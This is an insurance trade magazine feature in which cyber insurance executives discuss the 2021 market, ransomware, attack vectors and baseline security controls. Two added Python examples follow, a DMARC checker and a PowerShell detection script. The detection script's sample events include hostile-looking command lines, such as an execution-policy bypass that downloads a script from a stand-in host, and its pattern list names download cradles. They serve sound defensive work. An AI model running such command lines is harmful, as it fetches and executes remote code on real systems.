Insurance Business America Executive Insights Series: Cyber Market Update

EXECUTIVE INSIGHTS SERIES

CYBER MARKET UPDATE
How to navigate the firming cyber landscape to find the best options for your clients

Your partner for cyber. Admitted, A++ rated solutions from an industry leader offer strength and stability when it’s needed most. Learn more at HSB.com
© 2021 The Hartford Steam Boiler Inspection and Insurance Company. All rights reserved.

CYBER INSURANCE

CYBER MARKET UPDATE
As the year draws to a close, Insurance Business America checks in with executives at Munich Re and HSB to find out how the cyber market has evolved and what brokers should be prepared for heading into 2022

THE WORLD has entered uncharted territory. As businesses and individuals realize the true potential of global digital connectedness, they’re also facing the ever-growing threat of cybercrime and cybersecurity failures. As the old proverb goes, every rose has its thorn – and in the case of digitalization, the thorn of cyber risk only seems to be growing longer, sharper and far more dangerous. As such, it’s critically important for risk owners to learn from past incidents and stay on top of cybersecurity trends, threats and vulnerabilities.

The dollars potentially at risk if businesses fail to gain some control over their cyber exposures are significant. According to estimates by global researcher Cyber Ventures, cybercrime damage will reach $10.5 trillion by 2025. But there’s a long way to go. The results of Munich Re’s first Global Cyber Risk and Insurance Survey, published in March 2021, show that 81% of C-suite respondents think their company is not adequately protected against cyber threats.

By far the most prominent threat in the cyber space at the moment is ransomware. This variation of malware allows hackers to lock businesses or individuals out of their systems until they pay a ransom, usually in cryptocurrency. In the past year, there has been a significant uptick in the frequency and severity of ransomware attacks, impacting businesses of all sizes and in all sectors. There are several factors driving the surge in ransomware incidents, including the emergence of ransomware as a service, whereby criminals can purchase ready-made and relatively cheap malware on the dark web, which they can then use against victims with either a ‘spray and pray’ or more targeted approach. Some hackers are also using more sophisticated strategies, such as double and triple extortion campaigns, to ensure their ransomware attacks generate as much financial gain as possible.

Unfortunately, the hackers have seen success. In 2021, there have been multiple high-profile ransomware attacks, especially targeting companies with global supply chains or critical infrastructure (such as the Colonial Pipeline attack), or software/IT services providers (such as SolarWinds) that can be manipulated to spread the malware. These ransomware events – and the countless other cyber incidents, from data breaches to business email compromise, that trigger business downtime, extortion demands and other financial losses – highlight the importance of effective cyber risk management and the need for adequate cyber insurance protection. The latter part of that equation is only becoming more challenging for companies as the cyber insurance market tightens up in response to a surge in losses.

With all of this in mind, IBA reached out to five cyber insurance experts to explore the key themes and questions in the sector, from best practices for risk mitigation to up-and-coming cyber threats for businesses of all sizes and industries. Through their insights, we hope to provide brokers and agents with an enhanced understanding of the current state of the cyber insurance market.

Bethan Moorcraft
Senior editor
Insurance Business America

www.ibamag.com


MARKET OVERVIEW

How would you describe the state of the US cyber insurance market heading into the fourth quarter of 2021?

Laurie Schwarz: Increase in ransomware losses, restriction of terms and conditions, increase in premium, and a lack of market capacity continue heading into the end of 2021. [This year] is on track to have a greater number of ransomware victims and losses than the prior year. As insurers and reinsurers calculate the performance and profitability of their cyber portfolios – or lack thereof – this will drive current underwriting strategies, further limitation of coverage and premium increases. Given the unexpected premium increases of 50% to 200%+ in 2021, insurers find themselves far exceeding their 2021 premium budgets, forcing some to cut back on writing new business. One of the biggest changes in 2021 that will continue is insurers requiring baseline information security controls in order to entertain insuring an applicant’s cyber risk. Even if an applicant can demonstrate a baseline of information security controls, some insurers will go one step further and score the applicant’s controls, impacting the amount and cost of their insurance. The ‘x factor’ heading into 2022 is, for those insurers purchasing reinsurance, how their reinsurance renewal will impact their pricing, appetite, and terms and conditions for cyber. It’s anticipated the market correction will continue in 2022; the question is how dramatic it will be in comparison to 2021.

Annamaria Landaverde: Over the last two years, the cyber insurance market has experienced more significant and more frequent losses than anticipated. In response, insurers are adjusting rates to account for those losses, taking broad corrective measures such as restricting appetite and requiring minimum basic cybersecurity controls, investing in underwriting and portfolio management tools, and greater management of exposure to potential catastrophic events via limits and sublimits. In Q4 2021, the industry will continue to see all these actions in play, as well as deeper analysis of loss trends and overall performance results. These will be used to evaluate how and if the corrective measures of the previous two years materialized into quantifiable portfolio improvement. Rethinking cyber insurance wording will also be top of mind as we enter 2022 in a collective effort to manage catastrophic exposures, such as supply chain risk, cyber war and nation-state attacks. As evident in the earlier part of 2021, cyber insurers will continue to have the opportunity in Q4 to offer proactive loss mitigation services. Service offering uptake by policyholders is at an all-time high, reflecting that organizations of all sizes are not just seeking capacity from cyber insurers, but are looking for partners that can help identify and remediate cybersecurity issues, provide security awareness trainings, and facilitate engagements with experienced cybersecurity, incident response, and legal experts.

Robert Parisi: Large corporate buyers continue to face a hardening market. Driven in large part by an increasing frequency and severity of ransomware losses, insurers have actively sought to limit their exposure to risks, representing potential aggregation through narrowing coverage, reducing capacity and/or pushing attachment points higher. The market has also seen the departure of several insurers from the space. Insurers have approached the problem of potential accumulation and aggregation risk across a spectrum, from laser-focused exclusions on ransomware to broader exclusions seeking to address the larger accumulation risk. At the same time, insurers have raised rates, with the market seeing price increases accelerating. However, the opportunity for buyers to procure fit-for-purpose cyber coverage remains, albeit in a more challenging environment. Buyers are now facing increased scrutiny around those risks tied to potential aggregation or accumulation, in addition to more questions concerning ransomware and operational technology. Insurers continue to value an applicant that can demonstrate not just security but resilience.

“The hardening cyber insurance market has been extremely challenging for cyber brokers. Now they are working in a chasm between market confusion and customers living in the past” – Laurie Schwarz

MEET THE EXPERTS

Monique Ferraro
Cyber counsel, HSB
Monique Ferraro provides legal and technical expertise in support of HSB’s global cyber products. Her cybersecurity and privacy experience spans more than 25 years in digital forensics, e-discovery, information security and privacy. Ferraro holds several designations, including Certified Information Systems Security Professional (CISSP), Fellow of Information Privacy, Certified Information Privacy Professional/US (CIPP/US), Certified Information Privacy Manager (CIPM) and Chartered Property Casualty Underwriter (CPCU).

Annamaria Landaverde
SVP, cyber practice lead, Munich Reinsurance America
Annamaria Landaverde joined Munich Re in September 2017 and is responsible for the profit and growth of the cyber reinsurance portfolio and US team. She is also an active member of the Munich Re Cyber Global Line of Business Board. Prior to joining Munich Re, Landaverde served as cyber practice leader for a multiline MGA and a global insurer. Earlier in her career, she was a professional liability team lead and national accounts underwriter.

Paul Needle
SVP, cyber treaty underwriter, Munich Reinsurance America
Paul Needle began his insurance career as a managing general underwriter before serving as a professional lines underwriter. Prior to joining Munich Re in April 2021, he spent eight years at CNA Insurance, most recently as the financial institution cyber product lead. Needle holds a Certified Information System Auditor (CISA) designation.

Robert Parisi
Head of cyber solutions – North America, Munich Re Facultative & Corporate
Before joining Munich Re, Robert Parisi served as managing director and cyber leader at Marsh. Prior to that, he spent seven years at AIG, where he held several executive and legal positions and developed cyber insurance and specialty reinsurance to address aggregation-of-risk issues inherent in cyber insurance. Before AIG, he was in private practice as legal counsel to Lloyd’s of London.

Laurie Schwarz
Vice president, Munich Re Specialty Insurance
Laurie Schwarz has spent more than 36 years in the insurance market, specializing in errors & omissions, cyber and professional liability coverages as both an underwriter and broker. She joined Munich Re in April 2020 to help create and launch its Cyber and Cyber and Tech insurance products. Prior to that, she helped develop an underwriting technology platform at Symantec and also leveraged technology, data and analytics to create a cyber insurtech startup.


How does the hardening market impact insurance brokers? What must they do to navigate this market successfully and secure the best solutions for their clients?

Robert Parisi: Brokers have had to begin the process of organizing cyber submissions much earlier and have been forced to cast a wider net within their clients’ organizations to gather the data needed to respond to the expanding inquiry of insurers. Gone are the days of a few years ago, when a broker could procure coverage with a boilerplate application and a quick 30-minute phone call with the client’s chief information security officer. Generally speaking, brokers are advising clients that, in addition to breadth of information, the ability to provide a greater level of transparency into their information and technology governance is key to distinguishing that applicant in the eyes of the insurer.

Laurie Schwarz: The hardening cyber insurance market has been extremely challenging for cyber brokers. Now they are working in a chasm between market confusion and customers living in the past. Brokers are getting pushback from both sides. Brokers’ internal and/or external customers are having a harder time processing their 2021 cyber renewals. Being advised multiple times about how the cyber insurance market is hardening, many have found it hard to understand what it will mean for their cyber renewal quote. For those insureds that have not had a ransomware loss or have not had a loss paid exceeding their deductible, brokers are having difficulty explaining the significant changes in renewal terms – deductibles and premiums increasing in multiples, limits being reduced, and some coverages being restricted with co-insurance or no longer provided – compared to their experience in prior years. It’s not a comfortable conversation. Insurers are now pushing back on insureds, requiring them to have a minimal level of information security controls to qualify for coverage. This is a first. In prior years, simply working toward making various changes and improvements was enough. However, insurers, via their losses, are recognizing this is no longer enough. There’s hope that market predictability will improve for 2022, and with the experience of 2021, brokers’ messaging to their internal and external customers will be less likely to be debated or denied. Insureds will have their 2021 renewal experience as a baseline conversation.

CYBER INSURANCE: LOW PENETRATION, HIGH POTENTIAL

35% of business leaders are considering taking out a cyber insurance policy for their company and will most likely do so

81% of C-level executives said they feel inadequately protected against cybercrime

25% of C-level respondents were totally unaware of the opportunities that holistic cyber solutions offer

34% of C-level respondents have been in contact with their insurers

17% of C-level respondents still do not have an overview of the cyber insurance products and services on the market

Source: Munich Re Global Cyber Risk and Insurance Survey, 2021

“Social engineering has been a pernicious problem. As the market learns of a new hacker approach, the hackers change their tactics” – Monique Ferraro

Ransomware is arguably the hottest topic in cyber insurance today. How have you seen the ransomware threat evolve in recent years?

Robert Parisi: Ransomware has evolved tremendously since it first appeared nearly 40 years ago via floppy drive. Most recently, ransomware has increased not just in severity, as measured by the increased extortion demand, but also in frequency and breadth. In addition, the underlying malware elements of ransomware have also evolved and increased as the non-extortion damage caused by ransomware has expanded.

Monique Ferraro: Ransomware distribution five or six years ago was a low-level concern. It was mostly an annoyance that was not particularly targeted or sophisticated. Getting around the encryption was fairly trivial, and the ransom demands were pretty small in comparison to the large ones we are seeing today. For example, ransoms used to average a couple hundred to around a thousand dollars on average. We now see ransom demands of millions of dollars and attacks that are both sophisticated and layered. By sophisticated, I mean that the attackers are organized, even to the point that they have ‘customer service’ operations to assist victims in unencrypting their systems. They research their targets ahead of time, and they exercise discipline during the attack, which is increasingly multifaceted. The multifaceted attacks have distinct characteristics, but the thing they have in common is that there is more than one part of the attack. Victims often refuse to pay the ransom if they believe the attackers will come back or that there will be another stage of extortion. Some victims simply refuse to pay on principle. Still others have upped their security profiles, made sure they have working backups and provide their employees with regular cyber safety training. Those things have had a big impact.

What are the most common cybersecurity attack vectors and breach methods?

Robert Parisi: According to InfoSec firms, the leading cause of cyber breaches and incidents remains social engineering, specifically phishing as a prelude to ransomware. With regard to more sophisticated attacks, nation-state attacks – malicious cyberattacks that originate from a particular country to further that country’s interests – while less common, remain the costliest.

Monique Ferraro: The most common attack vectors change over time, largely as a result of a cat-and-mouse game between hackers and their targets. Right now, remote desktop protocol [RDP], poorly configured cloud storage, brute force and social engineering are at the top of the list. RDP has been a particularly troublesome vector during the pandemic, especially in the beginning of quarantine when businesses moved quickly to set up remote work and did not always properly configure their RDP. There is also a brisk online market for stolen RDP credentials that facilitate hacking. Poorly configured cloud storage has also proven to be vulnerable. Businesses flocked to the cloud to reduce operating costs and ensure that data is secure and available, but the accounts must be properly configured to provide adequate protection. Brute force attacks, when a hacker attempts to guess a user’s login, are still prevalent but less successful due to the adoption of password policies. Finally, social engineering has been a pernicious problem. As the market learns of a new hacker approach, the hackers change their tactics. For example, one week the primary social engineering approach will be phishing emails sent to payroll clerks, requesting the company W-2s for some important purpose. The next week, hackers may move on to approaching employees directly and offering to share part of the ransom if the attack is successful in return for their login credentials.

How has the COVID-19 pandemic impacted the cyber risk landscape?

Robert Parisi: The story of the COVID-19 pandemic remains to be written, and the confluence of increased ransomware due to a mass migration to remote work makes it difficult to separate which had the greater impact on risk and losses. The pandemic certainly saw many organizations unprepared to deal with enabling a remote workforce.

The pandemic has increased people’s personal reliance on technology. There are some elements of cyber coverage on homeowner’s and crime policies and on credit cards. What are the benefits of buying a stand-alone cyber policy?

Annamaria Landaverde: Personal lines cyber insurance is available as a coverage extension in homeowner’s policies. Coverage offered includes identity theft restoration and consultation, cyberbullying loss, and relocation expenses. For commercial lines, affirmative cyber coverage is available in various formats: embedded in traditional lines policies, such as BOPs; an endorsed or separate insuring agreement in financial lines policies, such as crime; or stand-alone cyber policies. While cyber enhancements to noncyber policies provide varying degrees of coverage, only a stand-alone cyber policy can provide the full breadth of first- and third-party coverage to address an organization’s holistic cyber risk management needs. Also included in stand-alone policies are post-incident response services, 24/7 access to breach counselors and, in many cases, contingent business interruption coverage stemming from a service provider outage, to name a few. More and more cyber insurers now also offer employee awareness training and real-time risk mitigation services, notifying organizations of a potential network vulnerability before it gets exploited.



SMALL COMMERCIAL

What attack vectors are cybercriminals using to target small businesses?

Laurie Schwarz: Cyber insurers are now requiring their small business clients to have a baseline level of information security controls. It starts with protecting the perimeter. Phishing events, business email compromise and unsecured open ports – including remote desktop ports – without compensating controls on publicly facing servers are common tactics used by threat actors to gain access to a company’s IT environment. Insurers will look for companies providing phishing training during employee onboarding and ongoing training – preferably, companies leveraging phishing simulation technology where they can demonstrate a less than 5% click-through failure rate. Insurers will also look for companies to deploy endpoint protection/detection technology [EPP/EDR], ideally with behavioral analysis capability. It’s critical to have EPP/EDR deployed on all endpoints, as well as having the sensors installed correctly. In the event there are alerts provided by the EPP/EDR technology, having 24/7/365 monitoring is important, as threat actors are known to strike on weekends/holiday weekends. Another key control is addressing administrative controls. Dual factor/multifactor authentication for accessing the network and critical data is a must. Limit the number of individuals who have administrator credentials, and for those who are network administrators, have separate credentials for the administrator account. In the event a threat actor gains access to the network environment and moves around the network and obtains administrative privileges, it’s imperative to have backups of critical data, workstations and servers in an offline/off-site/in-the-cloud disconnected from the network environment, requiring separate credentials to access the backups and preferably stored in an immutable fashion. The idea is to have backups the threat actor cannot encrypt, delete and/or corrupt. Having baseline controls aims to limit entry into the IT environment, lateral movement within the IT environment, and encrypting and/or deleting data/backups.

Paul Needle: In addition, attackers are using a method known as ‘living off the land.’ Adversaries are utilizing tools currently deployed by the victim to execute their attack. Examples include PowerShell and Cobalt Strike to quickly propagate malware and evade detection.

In turbulent waters, our cyber solutions will propel you forward. This is uncharted territory. With all that the digital future promises, the threat of cybercrime can make it feel like you are charging forward without a guide. But you’re not. We offer the products and services businesses need to sidestep risks, nimbly respond when breaches occur, and get back on track after time and money are lost to cybercrime. With Munich Re by your side, you can advance the digital future with confidence. For more information visit munichre.com/cyber. Munich Reinsurance America, Inc. All rights reserved.

FOUR STEPS TO BETTER CYBERSECURITY

According to HSB’s Monique Ferraro, sticking with the fundamentals is key to small business cybersecurity. She shares four ways businesses can prevent and mitigate damage if an attack occurs.

1. Know what kind of data you have and where it’s located

Tracking down data is much harder during or after a cyberattack than it is beforehand. Knowing what data you have – especially financial, business confidential, personal or health information – will give you the data you need ahead of a potential attack in order to determine your response.

2. Have multiple backups that you test regularly

It isn’t enough to just back up your data to the cloud. Sufficient backups consist of at least the cloud, as well as ‘air-gapped’ backups – backups that are not connected to the internet and are stored off-site to maximize utility in the event of a disaster.

3. Ensure that email security, such as DMARC, is implemented

DMARC is a technology that checks that an email actually came from the domain that it says it came from. DMARC is deployed by your email provider, but depending on the size and sophistication of your operation, it may be controlled by your IT department. Checking to ensure that you have at least DMARC in place will greatly reduce spam and phishing attempts so that your other controls can be more effective.

4. Provide regular cybersecurity awareness and security training

We are all aware of phishing attempts, but hackers are always honing their craft and changing up their approach. Regular cybersecurity awareness training, sending out reminders, posting posters and conducting phish tests of your employees all help to keep cybersecurity fresh in employees’ minds. Rewarding cyber hygiene practices, rather than punishing transgressions, goes a long way to ensuring that employees are not the weakest link in the attack chain.
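Step 3 of the ‘Four Steps’ sidebar above says to check that DMARC is in place. A DMARC record is a DNS TXT string of the form v=DMARC1; p=...; it tells receiving mail servers what to do with messages that fail SPF/DKIM alignment for your domain. Having a record is not the same as enforcing one: p=none only monitors, and a low pct or a weaker subdomain policy (sp) leaves gaps. The script below is an added example written for this page, not code from the article, HSB or Munich Re. It parses a record and lists the settings that keep a domain short of full enforcement. The records and the labels in SAMPLE_RECORDS are constructed for the example; nothing here queries DNS.

```python
"""Parse a DMARC TXT record and report weak settings (example code, not the article's)."""
from __future__ import annotations

# Constructed sample records for demonstration; these are not any real domain's records.
SAMPLE_RECORDS = {
    "example-monitor": "v=DMARC1; p=none; rua=mailto:dmarc@example.invalid",
    "example-partial": "v=DMARC1; p=quarantine; pct=25; sp=none",
    "example-strict": "v=DMARC1; p=reject; rua=mailto:dmarc@example.invalid; adkim=s; aspf=s",
    "example-broken": "p=reject; rua=mailto:dmarc@example.invalid",
}

# Ordering of policies from weakest to strongest, used to compare p= with sp=.
POLICY_RANK = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc(record: str) -> dict[str, str]:
    """Split a DMARC record into tag/value pairs; tag names are case-insensitive."""
    tags: dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> list[str]:
    """Return findings describing why the record falls short of full enforcement.

    An empty list means the record is syntactically usable, enforces p=reject or
    p=quarantine on all mail and subdomains, and asks for aggregate reports.
    """
    findings: list[str] = []
    tags = parse_dmarc(record)

    # RFC 7489 requires v=DMARC1 as the first tag; receivers discard anything else.
    if not tags or next(iter(tags)) != "v" or tags["v"].upper() != "DMARC1":
        return ["missing or misplaced v=DMARC1 tag; receivers will ignore the record"]

    policy = tags.get("p")
    if policy is None:
        return ["missing required p= tag; the record is invalid"]
    if policy not in POLICY_RANK:
        return [f"unknown policy {policy!r}"]
    if policy == "none":
        findings.append("p=none only monitors; mail that fails DMARC is still delivered")

    # pct defaults to 100; anything lower applies the policy to a sample of failing mail.
    pct = tags.get("pct", "100")
    if not pct.isdigit() or int(pct) < 100:
        findings.append(f"pct={pct}: the policy is applied to only part of failing mail")

    # sp= governs subdomains; when absent it inherits p=, but a weaker explicit value is a gap.
    sub = tags.get("sp")
    if sub is not None and POLICY_RANK.get(sub, -1) < POLICY_RANK[policy]:
        findings.append(f"sp={sub} is weaker than p={policy}; subdomains can still be spoofed")

    # Without rua= you get no aggregate reports and so no visibility into who sends as you.
    if "rua" not in tags:
        findings.append("no rua= address; no aggregate reports will be received")
    return findings


def assess_all(records: dict[str, str]) -> dict[str, list[str]]:
    """Assess a mapping of label -> record and return label -> findings."""
    return {label: assess_dmarc(rec) for label, rec in records.items()}


if __name__ == "__main__":
    for label, findings in assess_all(SAMPLE_RECORDS).items():
        status = "enforcing" if not findings else "needs attention"
        print(f"{label}: {status}")
        for f in findings:
            print(f"  - {f}")
```

To use it against a live domain, fetch the TXT record at _dmarc.yourdomain (with dig or your resolver library of choice) and pass the string to assess_dmarc; the checks are deliberately limited to what the record itself reveals, so SPF and DKIM setup still need their own review.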
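Paul Needle’s point above about ‘living off the land’ is that the tooling is legitimate, so a defender cannot simply block the binary; detection has to look at who launched PowerShell and how it was invoked. The script below is an added example written for this page, not code from the article or from any of the insurers quoted. It reads constructed process-creation events in an assumed key=value log format, scores each PowerShell launch on its parent process and on command-line switches that routine administration rarely uses, and decodes an encoded command so an analyst can read what was run. The host names, log layout, weights and threshold are assumptions made for the example.

```python
"""Score process-creation events for suspicious PowerShell use (example code, not the article's)."""
import base64
import re

# Constructed sample events in an assumed key=value format; this is not real telemetry.
# The encoded command is generated here from a harmless string so the sample decodes.
_DEMO_ENC = base64.b64encode("Write-Output demo".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    'ts=2021-10-22T09:00:00Z host=WS01 parent=explorer.exe image=powershell.exe '
    'cmdline="powershell.exe -File C:\\Scripts\\backup-check.ps1"',
    'ts=2021-10-22T09:05:00Z host=WS01 parent=WINWORD.EXE image=powershell.exe '
    f'cmdline="powershell.exe -nop -w hidden -enc {_DEMO_ENC}"',
    'ts=2021-10-22T09:10:00Z host=SRV02 parent=cmd.exe image=powershell.exe '
    'cmdline="powershell.exe -ep bypass -Command Invoke-WebRequest http://example.invalid/update.ps1"',
]

# Office applications have no routine reason to spawn a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (compiled pattern, weight, label): switches and cmdlets seldom seen in scheduled admin scripts.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(?:e|en|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "profile suppressed"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I), 2, "remote download"),
]
FLAG_THRESHOLD = 3  # assumed tuning value: one strong indicator, or an Office parent alone

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict, stripping the quotes around cmdline."""
    return {key: value.strip('"') for key, value in _FIELD.findall(line)}


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = re.search(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Return (score, reasons) for a single parsed event; non-PowerShell images score 0."""
    reasons = []
    if event.get("image", "").lower() != "powershell.exe":
        return 0, reasons
    score = 0
    if event.get("parent", "").lower() in OFFICE_PARENTS:
        score += 3
        reasons.append(f"Office application {event['parent']} spawned PowerShell")
    cmdline = event.get("cmdline", "")
    for pattern, weight, label in SUSPICIOUS_PATTERNS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(lines) -> list:
    """Parse and score each line; return the events at or above FLAG_THRESHOLD."""
    hits = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= FLAG_THRESHOLD:
            hits.append({
                "ts": event.get("ts"),
                "host": event.get("host"),
                "score": score,
                "reasons": reasons,
                "decoded": decode_encoded_command(event.get("cmdline", "")),
            })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The first sample event, a scheduled script launched from the desktop, scores zero; the other two are flagged. In production the same logic would run over Sysmon event ID 1 or Windows Security event 4688 records (with command-line auditing enabled), and the weights would be tuned against the organisation's own baseline of legitimate PowerShell use.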

“A third of small and mid-sized companies do not have cyber insurance because they do not want it or realize they need it. A quarter said it was because it is too expensive” – Monique Ferraro

What factors influence the cyber insurance buying decisions for small businesses?

Monique Ferraro: According to the most recent HSB/Zogby Analytics survey, American Business Cyber Security Habits & Landscape – A 2021 Survey of Business Decision Makers in SMBs, a third of small and mid-sized companies do not have cyber insurance because they do not want it or realize they need it. A quarter of respondents said it was because it is too expensive. Those who find cyber insurance too complicated, confusing and/or too difficult to obtain add up to approximately a quarter as well.

LARGE FINANCIAL AND CORPORATE ENTITIES

Large financial and corporate entities have long been targets of cybercriminals. Are any sectors or types of business more exposed than others, and if so, why?

Robert Parisi: The nature of technology is such that attackers can cast a wide net with little or no additional expense. At the same time, the easy availability of malware, which can now be literally licensed for use, enables a broader universe of criminals to expand their activities with relative ease. However, 2020 did see some trends with healthcare, government, financial institutions, retail, education and technology being the most targeted sectors of the economy, respectively. One growing trend in 2020 and 2021 was the increasing attacks associated with operational technology [OT]. As such, organizations with heavy reliance or use of OT have seen the greatest acceleration in attempted exploits.

Laurie Schwarz: Manufacturing and critical infrastructure are examples of industry verticals where information technology and operational technology exist, and they face greater cyber exposure than services-based entities. What is OT? According to the NIST, OT consists of programmable systems or devices that interact with the physical environment or manage devices that interact with the physical environment. These systems/devices detect or cause a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial control systems, building management systems, fire control systems and physical access control mechanisms. Two key challenges for manufacturers and critical infrastructure are updating and hardening OT assets and the integration of IT and OT assets. Updating and hardening OT assets includes many of the same areas as IT assets, such as patching of software and firmware, secure configuration, user and account access limitation, ensuring network connectivity security, removal of unnecessary software, and ensuring proper backups. The execution of how these items are addressed is very different. For example, patching can be challenging and often requires compensating controls to address beyond patching. OT assets were not designed to be connected to the internet and are typically kept offline, segregated from the corporate IT environment. In addition, OT assets are protected by plant engineers, outside of the corporate IT system administrators. With OT and IT being connected and exposed to the internet, OT assets’ vulnerabilities are accessible to threat actors. Industry verticals where the company’s operations rely on operational technology obviously have greater cyber exposures than services-based entities.

Paul Needle: I would equate exposure to risk. Risk can be defined as the product of impact and probability. To understand industries that are at greater risk, you must consider probability and impact. Financial institutions are reportedly targeted more than any other industry. Certainly, the inherent cyber risk of a financial institution is high. However, when you consider the cyber maturity level of a large financial institution, the residual risk is reduced by limiting probability of an occurrence. The financial impact of a successful attack on a financial institution is going to be much larger. It then becomes a risk tolerance question, along with the level of assurance, when underwriting a large financial institution. Another industry to consider would be manufacturing, which can be reliant on technology. Manufacturers have minimized exposure in terms of personally identifiable information [PII], but if the availability of their technology is gone, operations can come to a standstill. Some manufacturing sectors have a large and complicated attack surface from numerous devices, the Internet of Things [IoT] and custom machines. From an operational technology perspective, many organizations require remote connectivity in some form. With interconnected networks and complicated machinery, vulnerabilities become difficult to manage. The high probability of exploiting a vulnerability, combined with a large impact, implies some manufacturing operations could be higher-risk. The same exposures are found in healthcare, except impact is exponentially increased due to the confidentiality of information, the need for data integrity and the availability of technology. A loss of any could mean the loss of life. Other sectors that have realized large losses, specifically in ransomware, are education and municipalities. With fewer resources to identify and mitigate the probability of an attack, along with the potential for considerable impact, education and municipalities have been a target of ransomware. Managing risk becomes even more complicated if the company is large and/or public.

CYBERSECURITY IN PRIVATE LIFE

Are business leaders being offered cyber insurance for their private life? Yes: 13%; No: 87%

Source: Munich Re Global Cyber Risk and Insurance Survey, 2021

THE IMPORTANCE OF PRE-INCIDENT SERVICES

Which of these services should be covered by cyber insurance solutions? (Chart comparing responses from C-level executives with those of all business leaders; share of respondents, 0% to 70%. Individual values are not recoverable from the extracted text.) Services listed: network security (e.g. firewall); backup of critical systems and data; anti-malware tools; identity and access (e.g. password management); IT security consulting; employee security awareness measures; patch management (testing and installation of required updates); endpoint protection; mobile device management.

Source: Munich Re Global Cyber Risk and Insurance Survey, 2021

“Whereas just a few years ago, a broker could easily find $500 million in capacity for a client, now even loss-free renewals for corporate placements are struggling to renew existing limits” – Robert Parisi

How has the hardening cyber insurance market impacted corporate entities?

Robert Parisi: The most obvious impact of the hardening market on corporate entities has been the availability of capacity for large cyber insurance towers. Whereas just a few years ago, a broker could easily find $500 million in capacity for a client, now even loss-free renewals for corporate placements are struggling to renew existing limits – and where renewal occurs, it is typically with increased retention and premium of anywhere from 50% to 200% over the prior year's pricing. This is at a time when organizations are recognizing that technology-related risks represent the largest potential source of disruption to their operations.

Paul Needle: There are many ways the hardening market has impacted them. Capacity has been reduced. Premiums have increased. Many insurers are reducing $10 million limits. Some insureds are utilizing co-insurance and reduction of sublimits so that aggregate limit goals can still be achieved. Often, insureds are either forced to or choose to take on a higher deductible. Additionally, some carriers are carving out systemic risk with the option to purchase it back, similar to flood or earthquake in a property policy. Insurance carriers are adjusting several components, specifically underwriting scrutiny regarding controls, which should have immediate effects on losses and contribute toward a stabilized marketplace. All of this has contributed to difficult renewals for insureds. Certainly, the changes are necessary to ensure long-term sustainability of the cyber liability product.

Cyber has reached the board level. Why is it important for corporate entities to bring their CISO to the board and to educate management around cyber risks?

Robert Parisi: Technology-related risks represent the largest potential source of disruption to their operations. They need to be treated for what they are: operational risk. According to the 2021 Munich Re Global Cyber Risk and Insurance Survey, most business leaders are concerned about cyber risks, yet too many are unaware of the holistic solutions available to secure them from risks and losses.

EMERGING RISKS

Ransomware has topped the list of cyber insurance concerns for the past two years. How do you expect that risk to evolve, and what will ransomware look like in the future?

Laurie Schwarz: The highest-ranking cybersecurity officials in the US government believe ransomware is a national security threat that is here to stay. Personal information data breaches and the monetization of this data have lost their appeal and economic benefit; they're so 'last decade.' The development and expansion of ransomware as a service is one of the primary reasons why ransomware has increased in scale and scope. Whether it's spray-and-pray or targeted attacks, ransomware attacks are not slowing down while becoming more sophisticated. Companies in the supply chain that can have exponential aggregate impact are attractive targets. The SolarWinds attack is a prime example. Kaseya's attack is another example. The attack on Kaseya had an impact on many of their customers and then ultimately impacted Kaseya's customers' customers – hundreds to thousands of companies. It's the multiplicative effect, and it's driving up the price of the ransom demand. Hospitals and healthcare entities became the 'flavor of the month' during critical peak periods of the pandemic. Critical infrastructure is up next. Whether it's the Colonial Pipeline or JBS Foods, industry verticals once viewed as unlikely are now being attacked. As ransomware continues to grow in sophistication, perhaps with involvement from nation-state actors, it's growing from a corporate nuisance to a national security issue. Under the current administration, there's likely to be more involvement on a national level, and with that, there will be growing demand for companies to report and work with law enforcement and the FBI. Sadly, ransomware isn't going away anytime soon.

Annamaria Landaverde: While ransomware has been around for some time, it garnered significant attention during the WannaCry and NotPetya incidents of 2017. Since then, the various motivations and actors involved in ransomware threats have evolved. Actors range from individual cybercriminals to ransomware gangs to nation states, while motivations could vary from financial, espionage and disruption to ideological or political in nature. In recent years, ransomware has become a more frequent and severe threat, with ransom demands gradually increasing from a value that can elude law enforcement to present-day demands reaching millions. When we examine the impact that ransomware threats have had on the cyber insurance market, the increase in frequency and severity is notable. Some continue to view the exposure as strictly a cyber extortion coverage problem; however, it has evolved into much more in recent years. Cyber insurers are paying ransomware losses under multiple insuring agreements, including digital forensics and incident response, cyber extortion, business interruption, and data breach response – yes, data breach! In addition to ransom demands, actors may access and exfiltrate confidential data in advance of making the demand, which may require the affected company to comply with the various regulatory and privacy requirements that apply to its business. These costs may include notification and credit monitoring for affected individuals, legal expense, crisis management experts, and the possibility of liability and defense stemming from a third-party demand, as well as regulatory fines and penalties.

